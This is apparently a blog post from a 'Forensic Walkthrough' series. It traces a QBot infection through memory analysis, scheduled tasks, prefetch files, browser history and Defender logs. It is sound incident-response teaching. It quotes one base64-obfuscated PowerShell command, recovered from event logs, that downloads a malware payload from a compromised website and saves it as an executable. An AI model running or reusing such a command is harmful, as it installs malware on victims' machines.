For some reason, there are not so many posts on forensic examination of hosts infected with different malware families. We decided to change this tendency and start a new series – Forensic Walkthrough.
Today’s guest is QBot (QakBot). It was first discovered in 2009 and mainly targeted browsing data related to banking websites. Its worm-like capabilities allow it to spread through the networks, so you may find a bunch of infected hosts during your investigations. What’s more, it was suspected to be used by MegaCortex ransomware operators – “big game hunters” targeting big enterprises.
So we have a memory dump and a bitstream image of a compromised host. Let’s look what we can find!
Volatility has a bunch of plugins very useful for examinations related to incident response. Let’s start from pstree, a plugin capable of building prosesses tree. We can immediately see some suspicious processes:
So here we have a process with suspicious name, egvmxii.exe, started by Windows Explorer (explorer.exe). It must be something wrong with it. Ok, let’s continue to collect low-hanging fruits. Our potentially rogue process’ parent PID is 4000, let’s run malfind against it, a plugin capable of finding hidden or injected code in user mode memory.
So, something injected its code into legitimate Windows Explorer process (explorer.exe with PID 4000). Ok, good, let’s look inside our bitstream image. Remember schtasks.exe spawned by explorer.exe? It’s Task Scheduler. A-a-and, what can it be used for? Creating scheduled tasks, which are quite common persistence mechanism.
So let’s start from looking inside C:\Windows\System32\Tasks. One of the tasks is quite suspicious:
So, what does it run? Here is the answer:
Oh, egvmxii.exe, we have already seen it, right? Let’s look at its timestamps – we can use them as pivot point:
So, the file was created at 15:37:25 UTC. Let’s look at events near this time. If we look inside PowerShell.evtx, we can easily spot quite an interesting string in the logs:
powershell -Command (New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘aHR0cDovL3NvbGxpZ2h0LmNvbS5oay93cC1jb250ZW50L3VwbG9hZHMvMjAyMC8wNC9sYXN0LzQ0NDQ0NC5wbmc=’)),[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(‘QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl’)) + ‘1’ + ‘.e’ + ‘x’ + ‘e’)
What happens here? PowerShell is used to download 444444.png from hxxp://sollight[.]com.hk/wp-content/uploads/2020/04/last/, a compromised website, and save it as file1.exe under C:\Users\Public\tmpdir\.
Ok, let’s try to find evidence of execution. Prefetch folder is a good place to start. And here we go – FILE1.EXE-46CF3340.pf:
So, it was first executed at 15:37:23 (UTC). If we look at another file, EGVMXII.EXE-EAA08D18.pf, we can see that egvmxii.exe was first executed 7 seconds later – at 15:37:30 (UTC). Great, looks like we found the source of infection, right? But what executed PowerShell? Let’s find out!
Recent files may be of great help. And here we go, looks like Operating Agreement_1.doc was opened a few seconds before PowerShell was started:
Let’s collect more information about this file. For example, we can search for its name. And yes, we have a bunch of results!
Most interesting hit is in Microsoft Edge downloads history. Now we know that the file was originaly downloaded as Operating Agreement_1.zip from OneDrive:
Good ol’ phishing link – nice find! But that’s not all! If we look inside Windows Defender log, we can find more: extracted file is detected as TrojanDownloader:O97M/Obfuse.RDU!MTB. But it seems it was too late.
Ok, now we know that our victim downloaded an archive with a weaponized Microsoft Office document from a phishing link, opened it and it lead to QBot infection. Also we found out that QBot used scheduled tasks for persistence. But was it the only persistence mechanism used? Let’s run another keyword search, this time using egvmxii.exe as the keyword.
And yes, there is another persistence mechanism:
Of course, it’s not the whole set of forensic artifacts you can find dealing with QBot infections, but there are quite a few. As always, happy forensicating!